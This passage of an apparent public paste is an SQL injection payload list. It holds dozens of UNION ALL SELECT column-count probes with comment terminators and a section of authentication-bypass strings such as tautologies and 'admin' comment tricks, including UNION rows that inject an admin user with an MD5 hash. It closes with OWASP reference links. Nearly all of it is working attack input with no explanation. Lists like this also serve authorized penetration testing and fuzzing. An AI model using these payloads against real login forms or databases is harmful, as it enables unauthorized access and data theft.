  708. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
  709. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
  710. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
  711. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
  712. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
  713. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
  714. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
  715. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
  716. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
  717. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
  718. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
  719. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
  720. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
  721. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
  722. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
  723. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
  724. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
  725. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
  726. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
  727. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
  728. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
  729. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
  730. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
  731. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
  732. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
  733. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
  734. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
  735. UNION ALL SELECT 'INJ'||'ECT'||'XXX'--
  736. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--
  737. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--
  738. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--
  739. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--
  740. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--
  741. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--
  742. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--
  743. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--
  744. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10--
  745. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11--
  746. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12--
  747. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--
  748. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--
  749. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--
  750. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
  751. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
  752. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
  753. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
  754. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
  755. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
  756. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
  757. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
  758. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
  759. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
  760. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
  761. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
  762. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
  763. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
  764. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
  765. UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
  766. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
  767. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
  768. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
  769. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
  770. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
  771. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
  772. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
  773. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
  774. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
  775. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
  776. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
  777. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
  778. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
  779. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
  780. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
  781. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
  782. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
  783. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
  784. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
  785. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
  786. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
  787. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
  788. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
  789. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
  790.  
  791. _________________________________________________________________________________________________
  792. #SQL Injection Auth Bypass Payloads
  793. '-'
  794. ' '
  795. '&'
  796. '^'
  797. '*'
  798. ' or ''-'
  799. ' or '' '
  800. ' or ''&'
  801. ' or ''^'
  802. ' or ''*'
  803. "-"
  804. " "
  805. "&"
  806. "^"
  807. "*"
  808. " or ""-"
  809. " or "" "
  810. " or ""&"
  811. " or ""^"
  812. " or ""*"
  813. or true--
  814. " or true--
  815. ' or true--
  816. ") or true--
  817. ') or true--
  818. ' or 'x'='x
  819. ') or ('x')=('x
  820. ')) or (('x'))=(('x
  821. " or "x"="x
  822. ") or ("x")=("x
  823. ")) or (("x"))=(("x
  824. or 1=1
  825. or 1=1--
  826. or 1=1#
  827. or 1=1/*
  828. admin' --
  829. admin' #
  830. admin'/*
  831. admin' or '1'='1
  832. admin' or '1'='1'--
  833. admin' or '1'='1'#
  834. admin' or '1'='1'/*
  835. admin'or 1=1 or ''='
  836. admin' or 1=1
  837. admin' or 1=1--
  838. admin' or 1=1#
  839. admin' or 1=1/*
  840. admin') or ('1'='1
  841. admin') or ('1'='1'--
  842. admin') or ('1'='1'#
  843. admin') or ('1'='1'/*
  844. admin') or '1'='1
  845. admin') or '1'='1'--
  846. admin') or '1'='1'#
  847. admin') or '1'='1'/*
  848. 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
  849. admin" --
  850. admin" #
  851. admin"/*
  852. admin" or "1"="1
  853. admin" or "1"="1"--
  854. admin" or "1"="1"#
  855. admin" or "1"="1"/*
  856. admin"or 1=1 or ""="
  857. admin" or 1=1
  858. admin" or 1=1--
  859. admin" or 1=1#
  860. admin" or 1=1/*
  861. admin") or ("1"="1
  862. admin") or ("1"="1"--
  863. admin") or ("1"="1"#
  864. admin") or ("1"="1"/*
  865. admin") or "1"="1
  866. admin") or "1"="1"--
  867. admin") or "1"="1"#
  868. admin") or "1"="1"/*
  869. 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
  870.  
  871. _________________________________________________________________________________________________
  872. References :
  873.  
  874. SQL Injection ( OWASP )
  875.  
  876. point_right https://www.owasp.org/index.php/SQL_Injection
  877.  
  878. Blind SQL Injection
  879.  
  880. point_right https://www.owasp.org/index.php/Blind_SQL_Injection
  881.  
  882. Testing for SQL Injection (OTG-INPVAL-005)
  883.  
  884. point_right https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)
  885.  
  886. SQL Injection Bypassing WAF
  887.  
  888. point_right https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF
  889.  
  890. Reviewing Code for SQL Injection
  891.  
  892. point_right https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection
  893.  
  894. PL/SQL:SQL Injection
  895.  
  896. point_right https://www.owasp.org/index.php/PL/SQL:SQL_Injection
  897.  
  898. Testing for NoSQL injection
  899.  
  900. point_right https://www.owasp.org/index.php/Testing_for_NoSQL_injection
  901.  
  902. SQL Injection Injection Prevention Cheat Sheet
  903.  
  904. point_right https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html
  905.  
  906. SQL Injection Query Parameterization Cheat Sheet
  907.  
  908. point_right https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html
  909.  
Tags: efx tv sql injection sqlmap sql injection types
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!